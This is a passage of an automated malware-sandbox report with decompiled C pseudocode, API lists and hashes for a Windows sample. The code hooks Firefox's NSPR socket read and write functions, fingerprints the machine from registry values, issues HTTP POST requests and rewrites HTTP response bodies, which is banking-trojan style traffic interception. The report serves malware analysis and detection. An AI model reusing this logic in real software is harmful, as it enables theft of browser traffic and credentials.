				if(_t12 != 0) {
					E0040A754(__edi,  *0x41a148,  *0x41a158,  *0x41a168,  *0x41a178);
				}
				SetEvent( *0x41a500);
				return _t12;
			}







            0x004064da
            0x004064da
            0x004064f0
            0x004064fd
            0x0040650a
            0x00406517
            0x0040651c
            0x00406522
            0x00406524
            0x0040652b
            0x00406531
            0x00406535
            0x00406551
            0x00406551
            0x0040655c
            0x00406566

            APIs
            • GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket), ref: 004064E8
            • GetProcAddress.KERNEL32(00000000,PR_Close), ref: 004064F5
            • GetProcAddress.KERNEL32(00000000,PR_Read), ref: 00406502
            • GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0040650F
            • ResetEvent.KERNEL32(?,00000000,00000000), ref: 0040651C
              • Part of subcall function 00406290: VirtualAllocEx.KERNEL32(000000FF,00000000,00000012,00003000,00000040,00000000,774B9EB0,00000000,?,?,?,004064D9,0041A020,00000001,00403A56), ref: 004062CF
              • Part of subcall function 00406290: ResetEvent.KERNEL32(?,?,?,004064D9,0041A020,00000001,00403A56), ref: 004062EB
              • Part of subcall function 00406290: SetEvent.KERNEL32(?,?,?,004064D9,0041A020,00000001,00403A56), ref: 004063C8
            • SetEvent.KERNEL32(0041A140,00000000,?,00000000,00000000), ref: 0040655C
              • Part of subcall function 0040A754: InitializeCriticalSection.KERNEL32(0041A9F0,761B4EE0,00406556,0041A140,00000000,?,00000000,00000000), ref: 0040A76A
              • Part of subcall function 0040A754: GetProcAddress.KERNEL32(00000000,PR_GetNameForIdentity), ref: 0040A7A6
              • Part of subcall function 0040A754: GetProcAddress.KERNEL32(PR_SetError), ref: 0040A7B8
              • Part of subcall function 0040A754: GetProcAddress.KERNEL32(PR_GetError), ref: 0040A7CA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: AddressProc$Event$Reset$AllocCriticalInitializeSectionVirtual
            • String ID: PR_Close$PR_OpenTCPSocket$PR_Read$PR_Write
            • API String ID: 2746672884-3954199073
            • Opcode ID: 229c739bdb89446b045722edcae660acdacf94e29523f492da609071b473ed91
            • Instruction ID: f1cf11553b33c3751dcade8f3c3042e1ac9c40eea95838771e869acf833da72f
            • Opcode Fuzzy Hash: 229c739bdb89446b045722edcae660acdacf94e29523f492da609071b473ed91
            • Instruction Fuzzy Hash: 55F03171942350BBCB112FB6AC09EC63FA5B745760B144037B604A72B0C7B94470DB5D
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004145F1 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 99COMMON
            Download Yara Rule
            C-Code - Quality: 60%
            			E004145F1(void* __ecx, intOrPtr _a4) {
				char _v8;
				long _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				short _v90;
				short _v104;
				struct _OSVERSIONINFOW _v388;
				void* __edi;
				struct _OSVERSIONINFOW* _t32;
				char _t35;
				void* _t37;
				void* _t41;
				short _t43;
				void* _t50;
				void* _t51;
				intOrPtr _t54;
				signed int _t59;

				_t50 = __ecx;
				_v12 = 0x28;
				if(GetComputerNameW( &_v104,  &_v12) == 0) {
					E00410454( &_v104,  &M004032F4, 0xe);
					_v90 = 0;
				}
				E004104CB( &_v388,  &_v388, 0, 0x11c);
				_v388.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v388) != 0) {
					_push(0x100);
					_t32 =  &(_v388.szCSDVersion);
				} else {
					_push(0x11c);
					_t32 =  &_v388;
				}
				_push(0);
				_push(_t32);
				E004104CB(_t32);
				_t35 = E0041442C(0x80000002, _t50, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"InstallDate");
				_v16 = _v16 & 0x00000000;
				_v24 = _t35;
				_t37 = E00414526(_t50, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"DigitalProductId", 0,  &_v8);
				if(_t37 == 0xffffffff || _t37 <= 0) {
					_t59 = _v16;
				} else {
					_t59 = E00411888(_v8, _t37);
					E00410418(_v8);
				}
				_v20 = _t59;
				_push(E00411888( &_v24, 8));
				_t41 = E00411888( &_v388, 0x11c);
				_t54 = _a4;
				_push(_t41);
				_push( &_v104);
				_push(L"%s_%08X%08X");
				_t51 = 0x3c;
				_t43 = E004111A5( &_v104, _t51, _t54);
				_v12 = _t43;
				if(_t43 < 1) {
					E00410454(_t54, L"fatal_error", 0x16);
					_t43 = 0;
					 *((short*)(_t54 + 0x16)) = 0;
				}
				return _t43;
			}





















            0x004145f1
            0x00414602
            0x00414611
            0x0041461e
            0x00414625
            0x00414625
            0x0041463b
            0x00414647
            0x00414655
            0x00414660
            0x00414665
            0x00414657
            0x00414657
            0x00414658
            0x00414658
            0x0041466b
            0x0041466c
            0x0041466d
            0x00414682
            0x00414687
            0x0041468b
            0x0041469f
            0x004146a7
            0x004146c2
            0x004146ad
            0x004146b9
            0x004146bb
            0x004146bb
            0x004146cb
            0x004146d3
            0x004146dc
            0x004146e1
            0x004146e4
            0x004146e8
            0x004146e9
            0x004146f0
            0x004146f1
            0x004146fc
            0x004146ff
            0x00414709
            0x0041470e
            0x00414710
            0x00414710
            0x00414717

            APIs
            • GetComputerNameW.KERNEL32 ref: 00414609
            • GetVersionExW.KERNEL32(?,?,00000000,0000011C), ref: 0041464D
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: ComputerNameVersion
            • String ID: %s_%08X%08X$($DigitalProductId$InstallDate$SOFTWARE\Microsoft\Windows NT\CurrentVersion$fatal_error$unknown
            • API String ID: 3835364902-2859850376
            • Opcode ID: 812c89df1f03739c0470660d35a66389628491cdffd52c45845141f66ff7945d
            • Instruction ID: a8c8fb91d9a508bc6a520adfa2854498e347105d131b216cf6e60e8ad92b4997
            • Opcode Fuzzy Hash: 812c89df1f03739c0470660d35a66389628491cdffd52c45845141f66ff7945d
            • Instruction Fuzzy Hash: AA318471D00218BADB10EBA18C41FEF77BCAF45704F10416BFA08F6191D7789B8487A8
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004050B0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99libraryloaderCOMMON
            Download Yara Rule
            C-Code - Quality: 58%
            			E004050B0(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				struct HINSTANCE__* _v8;
				char _v12;
				char _v16;
				_Unknown_base(*)()* _v20;
				intOrPtr _v24;
				char _v40;
				char _v60;
				char _v84;
				char _v112;
				void* __edi;
				void* __esi;
				struct HINSTANCE__* _t34;
				_Unknown_base(*)()* _t46;
				int _t47;
				intOrPtr _t48;
				intOrPtr _t54;
				intOrPtr* _t59;
				void* _t61;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				CHAR* _t66;
				CHAR* _t67;
				_Unknown_base(*)()* _t68;
				WCHAR* _t70;
				void* _t72;
				void* _t73;

				_t62 = __ecx;
				_t70 =  &_v112;
				E0040F369(0xaa, _t70);
				_t34 = LoadLibraryW(_t70);
				_v8 = _t34;
				if(_t34 != 0) {
					_t65 =  &_v84;
					E0040F333(0xab, _t65);
					_t59 = GetProcAddress(_v8, _t65);
					_t66 =  &_v40;
					E0040F333(0xac, _t66);
					_v20 = GetProcAddress(_v8, _t66);
					_t67 =  &_v60;
					E0040F333(0xad, _t67);
					_t46 = GetProcAddress(_v8, _t67);
					_t72 = 0;
					_t68 = _t46;
					if(_t59 == 0 || _v20 == 0 || _t68 == 0) {
						L15:
						_t47 = FreeLibrary(_v8);
						asm("lock adc [eax], eax");
						return _t47;
					} else {
						_t48 = E00411ADE(L"SeTcbPrivilege");
						__imp__WTSGetActiveConsoleSessionId();
						_v24 = _t48;
						if(_t48 != 0xffffffff) {
							E0040503F(_t62, 0, _t68, _t48, _a4, _a8);
						}
						_push( &_v12);
						_push( &_v16);
						_push(1);
						_push(_t72);
						_push(_t72);
						if( *_t59() == 0) {
							goto L15;
						} else {
							_t61 = 0;
							if(_v12 <= _t72) {
								L14:
								_v20(_v16);
								goto L15;
							} else {
								goto L8;
							}
							do {
								L8:
								_t63 = _t72 + _v16;
								_t19 = _t63 + 8; // 0x0
								_t54 =  *_t19;
								 *(_t73 + _t54 - 0x7d) =  *(_t73 + _t54 - 0x7d) << 0xf8;
								_t61 = _t61 + 1;
								_t72 = _t72 + 0xc;
							} while (_t61 < _v12);
							goto L14;
						}
					}
				}
				return _t34;
			}






























            0x004050b0
            0x004050b7
            0x004050bf
            0x004050c7
            0x004050cd
            0x004050d2
            0x004050da
            0x004050e2
            0x004050f5
            0x004050f7
            0x004050ff
            0x0040510c
            0x0040510f
            0x00405117
            0x00405122
            0x00405124
            0x00405126
            0x0040512a
            0x004051a8
            0x004051ab
            0x004051ad
            0x00000000
            0x00405135
            0x0040513a
            0x0040513f
            0x00405145
            0x0040514b
            0x00405155
            0x00405155
            0x0040515d
            0x00405161
            0x00405162
            0x00405164
            0x00405165
            0x0040516a
            0x00000000
            0x0040516c
            0x0040516c
            0x00405171
            0x004051a2
            0x004051a5
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00405173
            0x00405173
            0x00405176
            0x00405179
            0x00405179
            0x0040517d
            0x00405199
            0x0040519a
            0x0040519d
            0x00000000
            0x00405173
            0x0040516a
            0x0040512a
            0x004051b5

            APIs
            • LoadLibraryW.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000,?,?,.exe,00000006,?,?,?,?), ref: 004050C7
            • GetProcAddress.KERNEL32(00000000,?), ref: 004050F3
            • GetProcAddress.KERNEL32(?,?), ref: 0040510A
            • GetProcAddress.KERNEL32(?,?), ref: 00405122
            • FreeLibrary.KERNEL32(?), ref: 004051AB
              • Part of subcall function 00411ADE: GetCurrentThread.KERNEL32 ref: 00411AEE
              • Part of subcall function 00411ADE: OpenThreadToken.ADVAPI32(00000000), ref: 00411AF5
              • Part of subcall function 00411ADE: OpenProcessToken.ADVAPI32(000000FF,00000020,?), ref: 00411B07
            • WTSGetActiveConsoleSessionId.KERNEL32(SeTcbPrivilege), ref: 0040513F
              • Part of subcall function 0040503F: EqualSid.ADVAPI32(00000000,?,?,004051B9,?,00405199,004051B9,?,00000001,?,0040460E,00000001,?), ref: 00405064
              • Part of subcall function 0040503F: CloseHandle.KERNEL32(?,?,004051B9,?,00405199,004051B9,?,00000001,?,0040460E,00000001,?), ref: 004050A5
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: AddressProc$LibraryOpenThreadToken$ActiveCloseConsoleCurrentEqualFreeHandleLoadProcessSession
            • String ID: .exe$SeTcbPrivilege
            • API String ID: 1107370034-552748125
            • Opcode ID: 4d5ed75e361e41208e755637fe10a422b2db3b59a5a0b9b78d2ab17aac78f3b6
            • Instruction ID: af93d03e908023f8f73bbdc0f2475eb7adcf453693406e5d1e343e0320bf2611
            • Opcode Fuzzy Hash: 4d5ed75e361e41208e755637fe10a422b2db3b59a5a0b9b78d2ab17aac78f3b6
            • Instruction Fuzzy Hash: D1318B35E00219BBDB21ABA5CC40AAFBB79EF48314F100136F901FA290C7799E05DBA5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00403947 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 85fileCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00403947(void* __ecx, void* __edx, void* __eflags) {
				long _v8;
				signed int _v12;
				void _v532;
				void* __edi;
				unsigned int _t22;
				void* _t29;
				void* _t38;
				void* _t40;
				WCHAR* _t41;
				void* _t42;
				void* _t45;

				_t40 = __edx;
				_t38 = __ecx;
				InitializeCriticalSection(0x41aa48);
				 *0x41aa3c = 0;
				 *0x41aa44 = 0;
				 *0x41aa40 = 0;
				 *0x41aa38 = 0;
				 *0x41a9d4 = 0;
				 *0x41a9d8 = 0;
				InitializeCriticalSection(0x41a9bc);
				_t41 =  &_v532;
				E00403ED1(_t38, _t41, 0);
				_v12 = _v12 | 0xffffffff;
				_v8 = 0x1fe;
				_t42 = CreateFileW(_t41, 0x80000000, 1, 0, 3, 0, 0);
				if(_t42 != 0xffffffff) {
					if(ReadFile(_t42,  &_v532, _v8,  &_v8, 0) != 0) {
						_v12 = _v8;
					}
					CloseHandle(_t42);
				}
				_t22 = _v12;
				if(_t22 == 0xffffffff || (_t22 & 0x00000001) != 0) {
					_t22 = 0;
				}
				 *((short*)(_t45 + (_t22 >> 1) * 2 - 0x210)) = 0;
				E0040BEFF( &_v532);
				E0040A6B4( &_v532, _t40);
				 *0x41aa18 = 0;
				 *0x41aa34 = 0;
				InitializeCriticalSection(0x41aa1c);
				if(GetModuleHandleW(L"nspr4.dll") == 0) {
					_t29 = 0;
				} else {
					_t29 = E004064DA(0, _t40, _t28);
				}
				if(_t29 != 0) {
					 *0x41a28c =  *0x41a28c | 0x00000001;
				}
				E004063F7();
				return 1;
			}














            0x00403947
            0x00403947
            0x0040395e
            0x00403969
            0x0040396f
            0x00403975
            0x0040397b
            0x00403981
            0x00403987
            0x0040398d
            0x00403990
            0x00403996
            0x0040399b
            0x004039ae
            0x004039bb
            0x004039c0
            0x004039da
            0x004039df
            0x004039df
            0x004039e3
            0x004039e3
            0x004039e9
            0x004039ef
            0x004039f5
            0x004039f5
            0x004039fb
            0x00403a09
            0x00403a14
            0x00403a1e
            0x00403a24
            0x00403a2a
            0x00403a39
            0x00403a44
            0x00403a3b
            0x00403a3d
            0x00403a3d
            0x00403a48
            0x00403a4a
            0x00403a4a
            0x00403a51
            0x00403a5c

            APIs
            • InitializeCriticalSection.KERNEL32(0041AA48,?,00000000,00000000), ref: 0040395E
            • InitializeCriticalSection.KERNEL32(0041A9BC,?,00000000,00000000), ref: 0040398D
              • Part of subcall function 00403ED1: PathRenameExtensionW.SHLWAPI(?,.dat,?,0041A2F0,00000000,00000032,?,774B9EB0,00000000), ref: 00403F4A
            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00000000,00000000), ref: 004039B5
            • ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000,?,00000000,00000000), ref: 004039D2
            • CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 004039E3
            • InitializeCriticalSection.KERNEL32(0041AA1C,?,00000000,00000000), ref: 00403A2A
            • GetModuleHandleW.KERNEL32(nspr4.dll,?,00000000,00000000), ref: 00403A31
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CriticalInitializeSection$FileHandle$CloseCreateExtensionModulePathReadRename
            • String ID: nspr4.dll
            • API String ID: 1155594396-741017701
            • Opcode ID: 4e651165b54f27171d18c63aedd34be292ea2b1fc516b58ede7e041d7070ec4f
            • Instruction ID: faa356100f19715857d71f4dc522eb06dc8f7ab7f24d0d40e61a73cbe08e654d
            • Opcode Fuzzy Hash: 4e651165b54f27171d18c63aedd34be292ea2b1fc516b58ede7e041d7070ec4f
            • Instruction Fuzzy Hash: B321CE70541208ABC7109FA9DDC9AEA3BACAF48354F10057BF014F32E0D7784A95DB5D
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00411F69 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 67networkCOMMON
            Download Yara Rule
            C-Code - Quality: 90%
            			E00411F69(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
				long _t18;
				char* _t21;
				signed int _t29;
				char* _t30;
				void* _t32;

				_t29 = _a20 & 0x00000002;
				_t18 = 0x8404f700;
				if(_t29 != 0) {
					_t18 = 0x8444f700;
				}
				if((_a20 & 0x00000004) != 0) {
					_t18 = _t18 | 0x00800000;
				}
				_t30 = "POST";
				if((_a20 & 0x00000001) == 0) {
					_t30 = "GET";
				}
				_t32 = HttpOpenRequestA(_a4, _t30, _a8, "HTTP/1.1", 0,  &E0041A000, _t18, 0);
				if(_t32 == 0) {
					L15:
					return 0;
				} else {
					if(_t29 == 0) {
						_push(0x13);
						_t21 = "Connection: close\r\n";
						_pop(0);
					} else {
						_t21 = 0;
					}
					if(HttpSendRequestA(_t32, _t21, 0, _a12, _a16) == 0) {
						L14:
						InternetCloseHandle(_t32);
						goto L15;
					} else {
						_a20 = _a20 & 0x00000000;
						_a8 = 4;
						if(HttpQueryInfoA(_t32, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
							goto L14;
						} else {
							return _t32;
						}
					}
				}
			}








            0x00411f70
            0x00411f74
            0x00411f79
            0x00411f7b
            0x00411f7b
            0x00411f84
            0x00411f86
            0x00411f86
            0x00411f8f
            0x00411f94
            0x00411f96
            0x00411f96
            0x00411fb7
            0x00411fbb
            0x0041201b
            0x00000000
            0x00411fbd
            0x00411fbf
            0x00411fc7
            0x00411fc9
            0x00411fce
            0x00411fc1
            0x00411fc1
            0x00411fc3
            0x00411fe0
            0x00412014
            0x00412015
            0x00000000
            0x00411fe2
            0x00411fe2
            0x00411ff6
            0x00412005
            0x00000000
            0x00412010
            0x00000000
            0x00412010
            0x00412005
            0x00411fe0

            APIs
            • HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,0041A000,8404F700,00000000), ref: 00411FB1
            • HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 00411FD8
            • HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 00411FFD
            • InternetCloseHandle.WININET(00000000), ref: 00412015
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
            • String ID: Connection: close$GET$HTTP/1.1$POST
            • API String ID: 3080274660-1621676011
            • Opcode ID: 24308ffbff9dee3e2b49f38ef62d9c96fe29dc0cdb3a5e1c88c09a77b56a8743
            • Instruction ID: dadc4041eaa678d4d7c44e9d8a62aac32346a7d162b7ae032daa3e2f14933954
            • Opcode Fuzzy Hash: 24308ffbff9dee3e2b49f38ef62d9c96fe29dc0cdb3a5e1c88c09a77b56a8743
            • Instruction Fuzzy Hash: CE1160312412096BEB258F54CD49FEB3A98EB08754F108126FF01E62E0D7B9D9A0D7EC
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040AF18 Relevance: 13.8, APIs: 6, Strings: 3, Instructions: 251COMMON
            Download Yara Rule
            C-Code - Quality: 79%
            			E0040AF18(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed char _v32;
				char _v36;
				char _v40;
				signed int _v44;
				void* _v48;
				signed int _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t100;
				signed int _t101;
				signed int _t102;
				intOrPtr _t104;
				void* _t105;
				signed int _t108;
				signed int _t109;
				signed int _t111;
				intOrPtr _t120;
				void* _t128;
				void* _t132;
				signed int _t140;
				void* _t150;
				struct _CRITICAL_SECTION* _t154;
				intOrPtr _t156;
				intOrPtr _t168;
				signed int _t170;
				signed int _t176;
				char _t178;
				void* _t179;
				intOrPtr _t181;
				signed int _t184;
				intOrPtr _t187;
				void* _t189;
				signed int _t190;
				void* _t192;
				void* _t193;
				void* _t194;

				E00403E2A();
				_t100 = E00403E39();
				_t181 = _a4;
				if(_t100 == 0 || _a8 == 0 || _a12 <= 0) {
					L43:
					_t101 =  *0x41aa14(_t181, _a8, _a12);
					goto L44;
				} else {
					_t154 = 0x41a9f0;
					EnterCriticalSection(0x41a9f0);
					_t102 = E0040A2FB(_t181);
					if(_t102 == 0xffffffff) {
						L42:
						LeaveCriticalSection(_t154);
						goto L43;
					}
					_t104 = _t102 * 0x38 +  *0x41aa0c;
					if( *((intOrPtr*)(_t104 + 0x30)) > 0) {
						L33:
						_t184 =  *((intOrPtr*)(_t104 + 0x30)) -  *((intOrPtr*)(_t104 + 0x34));
						__eflags = _a12 - _t184;
						if(_a12 < _t184) {
							_t184 = _a12;
						}
						_t87 = _t104 + 0x2c; // -4303328
						_t175 = _t87;
						_t105 = E00410454(_a8,  *_t87 +  *((intOrPtr*)(_t104 + 0x34)), _t184);
						 *((intOrPtr*)(_t105 + 0x34)) =  *((intOrPtr*)(_t105 + 0x34)) + _t184;
						__eflags =  *((intOrPtr*)(_t105 + 0x34)) -  *((intOrPtr*)(_t105 + 0x30));
						if( *((intOrPtr*)(_t105 + 0x34)) ==  *((intOrPtr*)(_t105 + 0x30))) {
							E00410418( *_t175);
							E004104B9(_t175, 0xc);
						}
						LeaveCriticalSection(_t154);
						_t101 = _t184;
						L44:
						return _t101;
					}
					if( *((intOrPtr*)(_t104 + 0x10)) <= 0) {
						goto L42;
					}
					LeaveCriticalSection(0x41a9f0);
					_t108 =  *0x41aa14(_t181, _a8, _a12);
					_v52 = _t108;
					if(_t108 <= 0xffffffff) {
						L41:
						_t101 = _v52;
						goto L44;
					}
					EnterCriticalSection(0x41a9f0);
					_t109 = E0040A2FB(_t181);
					_t176 = _t109;
					if(_t176 == 0xffffffff) {
						L38:
						_push(8);
						_push(0xffffe890);
						L39:
						 *0x41a9ec();
						_v52 = _v52 | 0xffffffff;
						L40:
						LeaveCriticalSection(_t154);
						goto L41;
					}
					_t170 = _v52;
					if(_t170 == 0) {
						L11:
						_t178 = _t176 * 0x38 +  *0x41aa0c;
						_v36 = _t178;
						if(_t170 > 0) {
							E00410454( *((intOrPtr*)(_t178 + 0x14)) +  *((intOrPtr*)(_t178 + 0x18)), _a8, _t170);
							 *((intOrPtr*)(_t178 + 0x18)) =  *((intOrPtr*)(_t178 + 0x18)) + _t170;
						}
						_t111 = E0040AB2D(_t157,  &_v20,  *((intOrPtr*)(_t178 + 0x14)),  *((intOrPtr*)(_t178 + 0x18)));
						_v52 = _t111;
						if(_t111 == 1) {
							_t120 = E0040ACD5( &_v20,  *((intOrPtr*)(_t178 + 0x18)),  *((intOrPtr*)(_t178 + 0x14)), ( &_v48 & 0xffffff00 | _v52 == 0x00000000) & 0x000000ff,  &_v48,  &_v40);
							_v60 = _t120;
							if(_t120 == 1) {
								if(E004072B2( *((intOrPtr*)(_t178 + 0x10)),  *((intOrPtr*)(_t178 + 0xc)),  *((intOrPtr*)(_t178 + 4)),  &_v48,  &_v40) != 0) {
									_t156 = _v40;
									_t128 =  *((intOrPtr*)(_t178 + 0x18)) - _v8 + _v12;
									_t129 = _t128 + _t156 + 0x14;
									if(_t128 + _t156 + 0x14 != 0) {
										_t187 = E004103ED(_t129);
										_v40 = _t187;
										if(_t187 != 0) {
											_t132 = E00410454(_t187,  *((intOrPtr*)(_t178 + 0x14)), _v12);
											_push(_t156);
											if((_v32 & 0x00000002) == 0) {
												E00410BF3( &_v32);
												_t189 = E00415540(_t187, _v16, "Content-Length",  &_v36) + _v60;
												E00410454(_t189, _v68, _t156);
												_t190 = _t189 + _t156;
												__eflags = _t190;
											} else {
												_push("%x\r\n");
												_t192 = _t187 + _t132;
												_t179 = 0xd;
												_t193 = _t192 + E004111E9(_t132, _t179, _t192);
												E00410454(_t193, _v48, _t156);
												_t194 = _t193 + _t156;
												E00410454(_t194, "\r\n0\r\n\r\n", 7);
												_t178 = _v60;
												_t190 = _t194 + 7;
											}
											_t138 =  *((intOrPtr*)(_t178 + 0x18));
											if(_v8 !=  *((intOrPtr*)(_t178 + 0x18))) {
												_t190 = _t190 + E00410454(_t190,  *((intOrPtr*)(_t178 + 0x14)) + _v8, _t138 - _v8);
											}
											E00410418( *((intOrPtr*)(_t178 + 0x14)));
											_t140 = _v44;
											 *((intOrPtr*)(_t178 + 0x14)) = _t140;
											 *((intOrPtr*)(_t178 + 0x18)) = _t190 - _t140;
										}
									}
								}
								_v44 = _v44 | 0xffffffff;
								E00410418(_v48);
							}
							_t154 = 0x41a9f0;
						}
						if(_v52 <= 0) {
							L30:
							if(__eflags == 0) {
								L32:
								 *((intOrPtr*)(_t178 + 0x2c)) =  *((intOrPtr*)(_t178 + 0x14));
								 *((intOrPtr*)(_t178 + 0x30)) =  *((intOrPtr*)(_t178 + 0x18));
								 *((intOrPtr*)(_t178 + 0x34)) = 0;
								 *((intOrPtr*)(_t178 + 0x14)) = 0;
								 *((intOrPtr*)(_t178 + 0x18)) = 0;
								E004077A6( *((intOrPtr*)(_t178 + 0x10)),  *((intOrPtr*)(_t178 + 0xc)));
								_t104 = _v40;
								 *((intOrPtr*)(_t178 + 0x10)) = 0;
								 *((intOrPtr*)(_t178 + 0xc)) = 0;
								goto L33;
							}
							__eflags = _v44 - 0xffffffff;
							if(_v44 != 0xffffffff) {
								goto L40;
							}
							goto L32;
						} else {
							if(_v44 != 0) {
								__eflags = _v52;
								goto L30;
							}
							_push(0);
							_push(0xffffe892);
							goto L39;
						}
					}
					_t168 =  *0x41aa0c; // 0x0
					_t150 = _t109 * 0x38 + _t168;
					_t157 =  *((intOrPtr*)(_t150 + 0x18)) + _t170;
					_t11 = _t150 + 0x14; // 0x14
					if(E004103A8( *((intOrPtr*)(_t150 + 0x18)) + _t170, _t11) == 0) {
						goto L38;
					} else {
						_t170 = _v52;
						goto L11;
					}
				}
			}














































            0x0040af24
            0x0040af29
            0x0040af2e
            0x0040af33
            0x0040b229
            0x0040b230
            0x00000000
            0x0040af4d
            0x0040af53
            0x0040af59
            0x0040af5b
            0x0040af63
            0x0040b222
            0x0040b223
            0x00000000
            0x0040b223
            0x0040af6c
            0x0040af76
            0x0040b1bc
            0x0040b1bf
            0x0040b1c2
            0x0040b1c5
            0x0040b1c7
            0x0040b1c7
            0x0040b1ca
            0x0040b1ca
            0x0040b1d7
            0x0040b1dc
            0x0040b1e2
            0x0040b1e5
            0x0040b1e9
            0x0040b1f1
            0x0040b1f1
            0x0040b1f7
            0x0040b1fd
            0x0040b239
            0x0040b23f
            0x0040b23f
            0x0040af80
            0x00000000
            0x00000000
            0x0040af87
            0x0040af94
            0x0040afa0
            0x0040afa4
            0x0040b21c
            0x0040b21c
            0x00000000
            0x0040b21c
            0x0040afab
            0x0040afad
            0x0040afb2
            0x0040afb7
            0x0040b201
            0x0040b201
            0x0040b203
            0x0040b208
            0x0040b208
            0x0040b20e
            0x0040b215
            0x0040b216
            0x00000000
            0x0040b216
            0x0040afbd
            0x0040afc3
            0x0040afe9
            0x0040afec
            0x0040aff2
            0x0040aff8
            0x0040b005
            0x0040b00a
            0x0040b00a
            0x0040b017
            0x0040b01c
            0x0040b023
            0x0040b047
            0x0040b04c
            0x0040b053
            0x0040b073
            0x0040b080
            0x0040b084
            0x0040b088
            0x0040b08e
            0x0040b099
            0x0040b09b
            0x0040b0a1
            0x0040b0b0
            0x0040b0ba
            0x0040b0bb
            0x0040b0f7
            0x0040b117
            0x0040b11c
            0x0040b121
            0x0040b121
            0x0040b0bd
            0x0040b0bd
            0x0040b0c4
            0x0040b0c6
            0x0040b0d3
            0x0040b0d6
            0x0040b0e2
            0x0040b0e5
            0x0040b0ea
            0x0040b0ee
            0x0040b0ee
            0x0040b123
            0x0040b12a
            0x0040b13f
            0x0040b13f
            0x0040b144
            0x0040b149
            0x0040b14f
            0x0040b152
            0x0040b152
            0x0040b0a1
            0x0040b08e
            0x0040b159
            0x0040b15e
            0x0040b15e
            0x0040b163
            0x0040b163
            0x0040b16e
            0x0040b185
            0x0040b185
            0x0040b192
            0x0040b198
            0x0040b19e
            0x0040b1a4
            0x0040b1a7
            0x0040b1aa
            0x0040b1ad
            0x0040b1b2
            0x0040b1b6
            0x0040b1b9
            0x00000000
            0x0040b1b9
            0x0040b187
            0x0040b18c
            0x00000000
            0x00000000
            0x00000000
            0x0040b170
            0x0040b174
            0x0040b181
            0x00000000
            0x0040b181
            0x0040b176
            0x0040b177
            0x00000000
            0x0040b177
            0x0040b16e
            0x0040afc5
            0x0040afce
            0x0040afd3
            0x0040afd5
            0x0040afdf
            0x00000000
            0x0040afe5
            0x0040afe5
            0x00000000
            0x0040afe5
            0x0040afdf

            APIs
              • Part of subcall function 00403E2A: WaitForSingleObject.KERNEL32(000000FF,00404A1C), ref: 00403E32
              • Part of subcall function 00403E39: WaitForSingleObject.KERNEL32(00000000,00405F1B,00000310,00000000,00000310,909011A2,00000002), ref: 00403E41
            • EnterCriticalSection.KERNEL32(0041A9F0), ref: 0040AF59
            • LeaveCriticalSection.KERNEL32(0041A9F0), ref: 0040AF87
            • EnterCriticalSection.KERNEL32(0041A9F0), ref: 0040AFAB
